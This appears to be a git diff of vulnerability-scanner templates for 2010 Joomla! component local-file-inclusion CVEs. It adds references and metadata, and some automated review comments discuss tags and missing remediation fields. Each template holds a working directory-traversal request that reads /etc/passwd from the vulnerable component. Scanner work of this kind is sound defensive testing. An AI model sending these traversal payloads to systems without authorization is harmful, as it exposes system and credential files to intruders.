- 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0982.yaml b/cves/2010/CVE-2010-0982.yaml index 9fa799d4c8..a69166498d 100644 --- a/cves/2010/CVE-2010-0982.yaml +++ b/cves/2010/CVE-2010-0982.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component com_cartweberp - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/10942 - https://www.cvedetails.com/cve/CVE-2010-0982 + - http://www.securityfocus.com/bid/37581 + - http://secunia.com/advisories/37917 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0982 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0985.yaml b/cves/2010/CVE-2010-0985.yaml index 8a68ba32ca..614705c1c5 100644 --- a/cves/2010/CVE-2010-0985.yaml +++ b/cves/2010/CVE-2010-0985.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component com_abbrev - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/10948 - https://www.cvedetails.com/cve/CVE-2010-0985 + - http://www.securityfocus.com/bid/37560 + - http://osvdb.org/61458 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0985 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-1056.yaml b/cves/2010/CVE-2010-1056.yaml index 2049880870..0d90b69924 100644 --- a/cves/2010/CVE-2010-1056.yaml +++ b/cves/2010/CVE-2010-1056.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component com_rokdownloads - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11760 - https://www.cvedetails.com/cve/CVE-2010-1056 + - http://www.securityfocus.com/bid/38741 + - http://secunia.com/advisories/38982 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-1056 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-1081.yaml b/cves/2010/CVE-2010-1081.yaml index 39650b4327..c6a152e813 100644 --- a/cves/2010/CVE-2010-1081.yaml +++ b/cves/2010/CVE-2010-1081.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11511 - https://www.cvedetails.com/cve/CVE-2010-1081 + - http://osvdb.org/62506 + - http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-1081 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-1217.yaml b/cves/2010/CVE-2010-1217.yaml index 45872b620b..40edd4a34c 100644 --- a/cves/2010/CVE-2010-1217.yaml +++ b/cves/2010/CVE-2010-1217.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. + description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. reference: - https://www.exploit-db.com/exploits/11814 - https://www.cvedetails.com/cve/CVE-2010-1217 - tags: cve,cve2010,joomla,lfi + - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt + - http://www.securityfocus.com/bid/38866 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-1217 + tags: cve,cve2010,joomla,lfi,plugin requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-1219.yaml b/cves/2010/CVE-2010-1219.yaml index 904655afb1..861e329273 100644 --- a/cves/2010/CVE-2010-1219.yaml +++ b/cves/2010/CVE-2010-1219.yaml 
@@ -1,26 +1,30 @@ id: CVE-2010-1219 + info: name: Joomla! Component com_janews - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11757 - https://www.cvedetails.com/cve/CVE-2010-1219 + - http://secunia.com/advisories/38952 + - http://www.securityfocus.com/bid/38746 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1219 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1302.yaml b/cves/2010/CVE-2010-1302.yaml index 8bf459dd68..2fd71f6329 100644 --- a/cves/2010/CVE-2010-1302.yaml +++ b/cves/2010/CVE-2010-1302.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component DW Graph - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11978 - https://www.cvedetails.com/cve/CVE-2010-1302 - tags: cve,cve2010,joomla,lfi + - http://www.securityfocus.com/bid/39108 + - http://secunia.com/advisories/39200 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1302 + tags: cve,cve2010,joomla,lfi,graph requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1304.yaml b/cves/2010/CVE-2010-1304.yaml index 96833ebf19..bc47af1a98 100644 --- a/cves/2010/CVE-2010-1304.yaml +++ b/cves/2010/CVE-2010-1304.yaml 
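Review bot: The tag appended in CVE-2010-1302, `graph`, is a generic English word rather than the component name, and CVE-2010-1304 does the same with `status`; tag runs keyed on such words will sweep in unrelated templates. The component identifiers already present in the request paths are more discriminating: `tags: cve,cve2010,joomla,lfi,dwgraphs` here and `tags: cve,cve2010,joomla,lfi,userstatus` in CVE-2010-1304.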
@@ -4,24 +4,26 @@ info: name: Joomla! Component User Status - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11998 - https://www.cvedetails.com/cve/CVE-2010-1304 - tags: cve,cve2010,joomla,lfi + - http://www.securityfocus.com/bid/39174 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1304 + tags: cve,cve2010,joomla,lfi,status requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1305.yaml b/cves/2010/CVE-2010-1305.yaml index ca2155a2d3..4649188fed 100644 --- a/cves/2010/CVE-2010-1305.yaml +++ b/cves/2010/CVE-2010-1305.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component JInventory 1.23.02 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12065 - https://www.cvedetails.com/cve/CVE-2010-1305 + - http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951 + - http://secunia.com/advisories/39351 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1305 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1306.yaml b/cves/2010/CVE-2010-1306.yaml index 7a3b6a6390..5979a5b672 100644 --- a/cves/2010/CVE-2010-1306.yaml +++ b/cves/2010/CVE-2010-1306.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component Picasa 2.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12058 - https://www.cvedetails.com/cve/CVE-2010-1306 + - http://secunia.com/advisories/39338 + - http://www.securityfocus.com/bid/39200 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1306 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1307.yaml b/cves/2010/CVE-2010-1307.yaml index 70c1ac485f..9b5bb7b612 100644 --- a/cves/2010/CVE-2010-1307.yaml +++ b/cves/2010/CVE-2010-1307.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component Magic Updater - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12070 - https://www.cvedetails.com/cve/CVE-2010-1307 + - http://secunia.com/advisories/39348 + - http://www.vupen.com/english/advisories/2010/0806 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1307 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1308.yaml b/cves/2010/CVE-2010-1308.yaml index 991bc53f66..f9f2d84665 100644 --- a/cves/2010/CVE-2010-1308.yaml +++ b/cves/2010/CVE-2010-1308.yaml 
@@ -4,24 +4,26 @@ info: name: Joomla! Component SVMap 1.1.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12066 - https://www.cvedetails.com/cve/CVE-2010-1308 + - http://www.vupen.com/english/advisories/2010/0809 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1308 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1312.yaml b/cves/2010/CVE-2010-1312.yaml index 022a54afd8..cc121bbc5f 100644 --- a/cves/2010/CVE-2010-1312.yaml +++ b/cves/2010/CVE-2010-1312.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component News Portal 1.5.x - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12077 - https://www.cvedetails.com/cve/CVE-2010-1312 + - http://secunia.com/advisories/39289 + - http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1312 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1313.yaml b/cves/2010/CVE-2010-1313.yaml index 46a6e36549..8025cded39 100644 --- a/cves/2010/CVE-2010-1313.yaml +++ b/cves/2010/CVE-2010-1313.yaml 
@@ -4,24 +4,26 @@ info: name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12082 - https://www.cvedetails.com/cve/CVE-2010-1313 + - http://www.securityfocus.com/bid/39237 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1313 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1314.yaml b/cves/2010/CVE-2010-1314.yaml index 0d487cfbda..8801e334b1 100644 --- a/cves/2010/CVE-2010-1314.yaml +++ b/cves/2010/CVE-2010-1314.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component Highslide 1.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12086 - https://www.cvedetails.com/cve/CVE-2010-1314 + - http://secunia.com/advisories/39359 + - http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1314 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1315.yaml b/cves/2010/CVE-2010-1315.yaml index 43663eef51..d17b7846a7 100644 --- a/cves/2010/CVE-2010-1315.yaml +++ b/cves/2010/CVE-2010-1315.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component webERPcustomer - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11999 - https://www.cvedetails.com/cve/CVE-2010-1315 + - http://secunia.com/advisories/39209 + - http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1315 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1340.yaml b/cves/2010/CVE-2010-1340.yaml index d369a9ddb3..999e6809a0 100644 --- a/cves/2010/CVE-2010-1340.yaml +++ b/cves/2010/CVE-2010-1340.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/33797 - https://www.cvedetails.com/cve/CVE-2010-1340 + - http://www.securityfocus.com/bid/38917 + - http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1340 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1345.yaml b/cves/2010/CVE-2010-1345.yaml index 814e4ab08a..82fda6212b 100644 --- a/cves/2010/CVE-2010-1345.yaml +++ b/cves/2010/CVE-2010-1345.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component Cookex Agency CKForms - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/15453 - https://www.cvedetails.com/cve/CVE-2010-1345 + - http://www.exploit-db.com/exploits/11785 + - http://www.osvdb.org/63031 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1345 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1352.yaml b/cves/2010/CVE-2010-1352.yaml index 5dd77fa70f..9304332380 100644 --- a/cves/2010/CVE-2010-1352.yaml +++ b/cves/2010/CVE-2010-1352.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component Juke Box 1.7 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12084 - https://www.cvedetails.com/cve/CVE-2010-1352 + - http://secunia.com/advisories/39357 + - http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1352 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1353.yaml b/cves/2010/CVE-2010-1353.yaml index cde20e6951..6d4b67ad6b 100644 --- a/cves/2010/CVE-2010-1353.yaml +++ b/cves/2010/CVE-2010-1353.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component LoginBox - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12068 - https://www.cvedetails.com/cve/CVE-2010-1353 + - http://www.securityfocus.com/bid/39212 + - http://www.vupen.com/english/advisories/2010/0808 + classification: + cve-id: CVE-2010-1353 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/cves/2010/CVE-2010-1354.yaml b/cves/2010/CVE-2010-1354.yaml index 2b37852cfc..b6435650fe 100644 --- a/cves/2010/CVE-2010-1354.yaml +++ b/cves/2010/CVE-2010-1354.yaml 
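Review bot: No `remediation` entry is added here, while the neighbouring hunks in this commit add `remediation: Upgrade to a supported version.` next to the new `classification` block; CVE-2010-1471, CVE-2010-1474 and CVE-2010-1475 have the same gap. If the field is surfaced in scan output, these four templates will show an empty remediation where their siblings do not, which reads as an oversight rather than a decision. Either add the same line or note in the PR why these are left out; the later enhancement dates on three of them suggest they came from a separate pass.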
@@ -4,24 +4,27 @@ info: name: Joomla! Component VJDEO 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12102 - https://www.cvedetails.com/cve/CVE-2010-1354 + - http://packetstormsecurity.org/1004-exploits/joomlavjdeo-lfi.txt + - http://secunia.com/advisories/39296 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1354 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1461.yaml b/cves/2010/CVE-2010-1461.yaml index 13660c3ae8..0409f0399b 100644 --- a/cves/2010/CVE-2010-1461.yaml +++ b/cves/2010/CVE-2010-1461.yaml 
@@ -4,24 +4,26 @@ info: name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. - reference: | + description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + reference: - https://www.exploit-db.com/exploits/12232 - https://www.cvedetails.com/cve/CVE-2010-1461 - tags: cve,cve2010,joomla,lfi + - http://www.securityfocus.com/bid/39504 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1461 + tags: cve,cve2010,joomla,lfi,photo requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1469.yaml b/cves/2010/CVE-2010-1469.yaml index d06c195c18..b8370e009c 100644 --- a/cves/2010/CVE-2010-1469.yaml +++ b/cves/2010/CVE-2010-1469.yaml 
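Review bot: The `tags` line gains `photo`, which none of the other Joomla LFI templates in this chunk carry and which does not name a product, component or vulnerability class, so it looks like an accidental addition; suggest `tags: cve,cve2010,joomla,lfi` unless a `photo` tag is deliberately being introduced. Tags drive template selection on the command line, so a one-off tag that nothing else shares adds noise without giving users a useful filter.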
